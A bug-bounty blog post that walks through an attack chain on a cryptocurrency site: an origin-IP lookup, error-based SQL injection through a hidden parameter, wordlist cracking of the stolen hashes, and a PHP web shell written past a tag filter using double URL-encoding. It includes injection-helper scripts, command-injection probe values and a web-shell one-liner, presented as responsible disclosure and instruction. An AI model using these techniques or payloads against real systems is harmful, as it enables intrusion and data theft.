How we hacked one of the world’s largest Cryptocurrency Websites

Bug Bounty

One of the world’s largest cryptocurrency sites was hacked by the Strynx team, who found a chain of vulnerabilities that could have led to the loss of millions of dollars. One of the team members shares his view of how we discovered such a critical issue, one involving the data of millions of users.

Here’s how we discovered it:

The testing had two phases: manual and automated recon.

The main aim was to discover an HTTP API that could be accessed and exploited with a few commands. Manual recon is preferred because it keeps you independent of particular scripts and tools. Automated tools make things simple, but they take a long time to run and throw out a lot of false positives, whereas manual recon produces far fewer false positives and often finds issues faster.

To begin with, the website was behind Cloudflare. There are various methods of retrieving the real server IP, but Censys is generally preferred: its fast, accurate results speed up the recon process considerably. Censys is one of the best of the many tools used for automated recon; we’ll deep-dive into some of these tools in the next blog. (Finding the origin only matters because the origin accepted connections from anyone. An origin that accepts traffic only from Cloudflare’s IP ranges, or that requires Cloudflare’s authenticated origin pulls, cannot be reached directly, and the WAF is not bypassed.) After obtaining the IP, port scanning was performed. Nmap was used to discover all open ports and services that could potentially be used to take over the server or harm the company. No unusual ports were found, only port 443 for the website. The website was blockchain-based, and it is often assumed that sites dealing with blockchain are secure and no harm can be done. That was not the case here. Below we show how this server was exploited by finding and chaining several issues.

On exploring the website, it was seen that every request in the site was accompanied by a CSRF token. For those who don’t know, a CSRF token is a secret, unpredictable value generated server-side and tied to the user’s session; because a page on another site cannot read it, a script that forges a request on behalf of the target user cannot supply the correct token and the request is rejected. Here the token was regenerated for every request, and an endpoint was called to generate it. To avoid inserting a new token by hand for every request, a Python script was developed. If you want to know how it was done, refer to this link: https://stackoverflow.com/questions/13567507/passing-csrftoken-with-python-requests. Then it was time to deep dive.

Here is a short code snippet we used:

from cmd import Cmd
import requests
from bs4 import BeautifulSoup

# The session cookie and both URLs are placeholders, as in the original snippet.
COOKIES = {"PHPSESSID": "a1sw4s4e7s4s55w6s6sw8s5q2a"}
HEADERS = {}


class Terminal(Cmd):
    prompt = '> '

    def __init__(self):
        # Fetch the form once to pick up the first CSRF token
        url = "url"
        response = requests.get(url, headers=HEADERS, cookies=COOKIES)
        soup = BeautifulSoup(response.text, 'html.parser')
        self.token = soup.find('input', {'name': 'token'})['value']
        Cmd.__init__(self)

    def default(self, args):
        # Every line typed at the prompt is appended to the injection prefix
        injection = "example" + args
        print(injection)
        url = "example.coin"
        data = {
            "username": "b",
            "password": "a",
            "db": injection,        # the hidden, injectable parameter
            "token": self.token,
            "login": "",
        }

        response = requests.post(url, headers=HEADERS, cookies=COOKIES, data=data)
        soup = BeautifulSoup(response.text, 'html.parser')

        print(response.text)
        # The server only issues a fresh token when the request did not error out,
        # so keep the old one if a PDOException came back
        if "PDOException" not in response.text:
            self.token = soup.find('input', {'name': 'token'})['value']


terminal = Terminal()
terminal.cmdloop()

The next step was to look for hidden directories and paths on the web server, using tools like DirBuster and gobuster together with a wordlist. As rockyou4.txt and directory-list-2.3-*.txt are very well known, and the usual wordlists are familiar to developers and pen-testers alike, a wordlist of less common terms was prepared instead. The main focus was JavaScript files, including the site’s jQuery code, because they reveal endpoints and parameter names. Other methods were also used to enumerate hidden files, but we’ll leave those for later. After this, Burp was used to analyse all the requests. Various POST requests were examined for issues, and parameters were tampered with to understand the site’s functionality and how the database connection was used. It turned out that the site lacked error handling and leaked data when certain parameters were tampered with.

Protip: always tamper with data to look for loopholes. If the value of a parameter is 0, make it 1 and see what happens; if a parameter expects one kind of value, send the opposite.

On analysing the server (looking into the JS files and the error messages), multiple hidden parameters were found, along with sensitive information about the internal functions used by the website. These functions were meant to improve the user experience but turned out to be the site’s worst nightmare. Various types of injection worked, but we will focus on one of them in depth. On observing the communications, it was noted that the application accepted some SQL special characters, so it was time to search for SQL injection. On testing one of the hidden parameters, an error-based SQLi was observed. What the parameter did was not understood, as it made no observable change on the page, yet it still caused database queries. It was probably some functionality used for testing whose code was not removed before the site went to production.

PDO Exception #1
PDO Exception #2

Here are some of the PDO exceptions we found. PDO is PHP’s database abstraction layer, and a PDOException is what it throws when a query fails; when the application echoes the exception instead of catching it, the response carries the SQLSTATE code and the driver’s error text, which tells the attacker exactly how the injected input broke the query. If you don’t know PDO exceptions well, stay tuned for upcoming blogs, where we will write about how to exploit them when you find ones like this.
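As an added example (our code, not code from the original post), here is a small offline model of the flaw and of the check we run for it: a login handler that concatenates the hidden db parameter into its query and echoes the database error, its fixed counterpart using a bound parameter and a generic error message, and a quote-pair probe that flags a parameter as likely injectable when a lone quote produces a leaked error and a doubled quote does not. The handler is written with Python’s sqlite3 module rather than PHP/PDO, and the table, column and host names are made up.

```python
import re
import sqlite3

# Constructed stand-in for the vulnerable login handler: the hidden "db" parameter is
# concatenated into the query and the raw database error is echoed to the client.
# Table, column and host names are hypothetical.
def _fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE databases (name TEXT, host TEXT)")
    conn.execute("INSERT INTO databases VALUES ('prod', 'db1.internal')")
    return conn

def vulnerable_login(db_name):
    conn = _fresh_db()
    try:
        row = conn.execute(
            f"SELECT host FROM databases WHERE name = '{db_name}'"   # string-built query
        ).fetchone()
    except sqlite3.Error as exc:
        return f"PDOException: {exc}"      # error text reaches the client
    return f"host={row[0]}" if row else "no such database"

def hardened_login(db_name):
    conn = _fresh_db()
    try:
        row = conn.execute(
            "SELECT host FROM databases WHERE name = ?", (db_name,)   # bound parameter
        ).fetchone()
    except sqlite3.Error:
        return "internal error"            # details belong in the server log only
    return f"host={row[0]}" if row else "no such database"

# Strings that, in a response body, indicate a database error leaked to the client.
# Deliberately short; extend it with the driver strings you actually see.
ERROR_MARKERS = re.compile(
    r"PDOException|SQLSTATE|syntax error|unrecognized token|error in your SQL syntax",
    re.I,
)

def probe_error_based(send, value="prod"):
    """Quote-pair heuristic (the same idea sqlmap uses): a lone quote should break
    the query, while a doubled quote is a legal escaped quote and should not.
    `send` is any callable taking the parameter value and returning the response body."""
    single = send(value + "'")
    double = send(value + "''")
    leaked = ERROR_MARKERS.search(single) is not None
    recovered = ERROR_MARKERS.search(double) is None
    return {
        "error_leaked": leaked,
        "likely_injectable": leaked and recovered,
        "evidence": single if leaked else "",
    }
```

Against a live target, pass probe_error_based a send callable that performs the real HTTP request, for example a wrapper around the requests.post call in the terminal snippet above that returns response.text; the doubled-quote check is what separates a real injection point from a handler that simply errors on any odd input.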

An example of a hidden parameter:

Suppose a JS file contains something like document.getElementById(‘id’). If that JS file is included in some HTML page, the server-side handler most likely reads a request parameter of the same name, so it can be called from the URL as example.com/index.php?id=somevalue. This and other similar methods are how hidden parameters can be found.
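To make that concrete, here is an added example (ours, not from the original post) of pulling candidate parameter names and paths out of a JavaScript file with a few regular expressions: element ids passed to getElementById, keys read through URLSearchParams.get, names in query strings inside string literals, and keys of object literals posted as form bodies. The JavaScript sample is constructed for the example; the endpoint and parameter names in it are made up and do not come from the target site.

```python
import re
from urllib.parse import urlencode

# Constructed sample JavaScript for this example; the names in it are made up.
SAMPLE_JS = """
var id = document.getElementById('id').value;
var q = new URLSearchParams(location.search);
var debug = q.get('debug');
var dbName = q.get("db");
$.post('/login.php', {username: u, password: p, token: t, db: dbName});
fetch('/api/export?format=csv&internal=1');
"""

NAME = r"[A-Za-z_][\w-]*"

# Each pattern captures one place where a parameter name tends to surface in client code.
PATTERNS = {
    "getElementById": re.compile(r"getElementById\(\s*['\"](" + NAME + r")['\"]\s*\)"),
    "searchparams_get": re.compile(r"\.get\(\s*['\"](" + NAME + r")['\"]\s*\)"),
    "query_string": re.compile(r"[?&](" + NAME + r")="),
}
OBJECT_LITERAL = re.compile(r"\{([^{}]*)\}")
OBJECT_KEY = re.compile(r"(?:^|,)\s*(" + NAME + r")\s*:")

def extract_params(js):
    """Return sorted candidate parameter names found in a JS source string.
    Heuristic by design: `.get(` also matches Map.get, so expect some noise."""
    names = set()
    for pattern in PATTERNS.values():
        names.update(pattern.findall(js))
    # keys of {a: ..., b: ...} objects, the shape jQuery/fetch send as request bodies
    for body in OBJECT_LITERAL.findall(js):
        names.update(OBJECT_KEY.findall(body))
    return sorted(names)

def extract_paths(js):
    """Return sorted server-side paths referenced in string literals."""
    return sorted(set(re.findall(r"['\"](/[\w./-]+)", js)))

def build_probe_urls(base_url, names, value="1"):
    """Turn candidate names into GET requests to try each one against a handler."""
    return [f"{base_url}?{urlencode({name: value})}" for name in names]
```

The output is a list of names to try, not a list of vulnerabilities: feed each one through build_probe_urls (and the equivalent POST body) and watch for a response that differs from the baseline, which is how a parameter like the db one above, with no visible effect on the page, still shows up.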

The parameter was also tampered with to look for command injection, using values such as ‘;id’ or ‘;pwd’, to see whether they produced output or threw an error that would help us understand the application. This didn’t work, so the next step was to exploit the SQLi found earlier.

There are various methods to find and exploit SQLi; for those, refer to any of the cheat sheets available online, as there is too much to cover here. If another blog is needed on this, please say so in the comments so that we can write about it later. Various data was extracted from the database, and the juiciest credentials were the database login credentials. Passwords are usually stored as hashes, so the next job was cracking them (hashes are not decrypted; they are matched by hashing candidate passwords and comparing). The hashes fell easily, as one of them was a common password from public wordlists. It was like... Ummm... such a critical site, such little protection.
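An added example of that cracking step (our code, not the team’s tooling): identify the format of a stored hash from its shape and run a wordlist against it with hashlib. The wordlist and the hashes in the test are constructed; a real run would use rockyou.txt or similar, and salted or slow formats such as bcrypt are recognised but deliberately not attempted here, since they need hashcat or John rather than a few lines of Python.

```python
import hashlib

# Constructed wordlist standing in for a public list like rockyou.txt (a few entries only).
WORDLIST = ["123456", "password", "qwerty", "letmein", "admin123"]

# Unsalted hex digests are recognisable by length alone; these are the formats that
# turn up in older PHP applications that call md5()/sha1() on the password directly.
HEX_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}

def identify(stored):
    """Guess the hash format from its shape. Returns None if unrecognised."""
    if stored.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"                      # salted and slow: needs a real cracker
    s = stored.strip().lower()
    if s and all(c in "0123456789abcdef" for c in s):
        return HEX_BY_LENGTH.get(len(s))
    return None

def crack(stored, wordlist=WORDLIST):
    """Wordlist attack against one unsalted hash. Returns the plaintext or None."""
    algo = identify(stored)
    if algo not in HEX_BY_LENGTH.values():
        return None                          # bcrypt/unknown: out of scope here
    target = stored.strip().lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None

def crack_many(stored_hashes, wordlist=WORDLIST):
    """Crack a batch and report how many fell, which is the number the report needs."""
    results = {h: crack(h, wordlist) for h in stored_hashes}
    cracked = sum(1 for v in results.values() if v is not None)
    return results, cracked
```

The point for the defender is in identify: a 32- or 40-character hex digest means an unsalted fast hash, and against those a wordlist of a few million entries finishes in seconds, which is why the database credentials fell so quickly here.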

Ok, we got SQL access. What next?

It’s time for RCE.

After getting remote SQL access, it is possible to write a PHP shell to disk if the database account has file-write privileges and the web root is writable by the database process (in MySQL, for instance, this needs the FILE privilege, and secure_file_priv must not restrict the target directory). To our surprise, it did. It was possible to write a shell into /var/www/html, which created a PHP shell in the root directory of the website. But it wasn’t quite that easy.

Hurdles don’t ever stop

It turned out there was a filter on the parameter that looked for tags (XSS prevention :P). This was bypassed with double URL-encoding, which allowed malicious PHP files to be written to the system. For those who don’t know how to get a shell from SQLi, try sqlmap to learn more: its --os-shell option checks whether the injection can write to the web directories and, if so, drops a PHP file stager which, when opened, lets us upload our web shell to the server. From the web shell we got a reverse shell to the system, and hence RCE!
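An added example (ours, not the site’s filter or the payload we used) of why the double encoding worked and how to fix it: a tag filter that inspects the parameter as the web framework hands it over, after one round of URL-decoding, is blind to a payload encoded twice if the application decodes the value again before using it. The hardened version decodes to a fixed point before filtering. The pipeline ordering and the PHP one-liner are assumptions for illustration; the post does not say what the filtered parameter or the real decoding path looked like.

```python
import re
from urllib.parse import quote, unquote

# A classic one-line PHP web shell, used here only as the payload to smuggle past the filter.
SHELL_PAYLOAD = "<?php system($_GET['c']); ?>"

TAG_RE = re.compile(r"<[^>]*>")

def naive_tag_filter(value):
    """Hypothetical stand-in for the site's XSS filter: reject anything that looks like a tag."""
    return TAG_RE.search(value) is None

def single_encode(payload):
    return quote(payload, safe="")

def double_encode(payload):
    """Encode twice: '<' -> '%3C' -> '%253C'. One decode turns it back into '%3C', not '<'."""
    return quote(quote(payload, safe=""), safe="")

def vulnerable_pipeline(wire_value):
    """Assumed ordering that makes the bypass work: the framework URL-decodes the
    parameter once, the filter looks at that, and the application decodes it a second
    time before writing it to disk. Returns the value that would be written, or None if blocked."""
    seen_by_filter = unquote(wire_value)
    if not naive_tag_filter(seen_by_filter):
        return None
    return unquote(seen_by_filter)

def canonicalize(value, max_rounds=5):
    """Decode until nothing changes, so the filter sees what the application will use."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def hardened_pipeline(wire_value):
    """Canonicalise first, filter second, and never decode again afterwards."""
    value = canonicalize(wire_value)
    if not naive_tag_filter(value):
        return None
    return value
```

Two caveats belong with the fix. Canonicalising changes any legitimate value that contains a literal percent sign, so the cleaner rule is to decode exactly once at the framework boundary and never again in application code. And a tag blacklist in front of a SQL-to-file write is the wrong control anyway: the writable web root and the database account’s file privileges are what turned an injection into RCE, and removing those closes the path whatever the encoding.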

After this, the report was submitted with screenshots and a proper PoC via secure channels. Within an hour a reply came back acknowledging the report and asking for personal details in order to pay the bounty. To my surprise, the company rewarded this effort with a 5-digit bounty. We appreciate the company’s response and fix time: the issue was fixed in just 2 hours. Everything from the error messages to the database names was fixed in no time. Kudos to the company!

Please leave any comments or suggestions for this blog, and for any further blogs you would like to read. We provide services to companies who would like their products tested. If you’re a company that wants us to perform complete testing of your site, please use the Contact Us page to drop a message, or write to info(at)strynx.org. We will try to reply as early as possible.

54 thoughts on “How we hacked one of the world’s largest Cryptocurrency Websites”

  1. Nick December 24, 2019 8:40 pm

    The write-up is much, much better than others I attended. Admin shows only those vulnerabilities that are truly exploitable and no rubbish 🙂 It’s superb! Heads up 🙌🙌🙌🙌

  8. Yunus Ahmed January 2, 2020 12:25 pm

    It would be great if you elaborated/explained the steps you took to exploit SQLi and RCE. After all, the exploitation steps are the main part of hacking.

  11. 31337$ January 15, 2020 7:34 pm

    Bounty is 31337$, that’s great, keep it going dude.
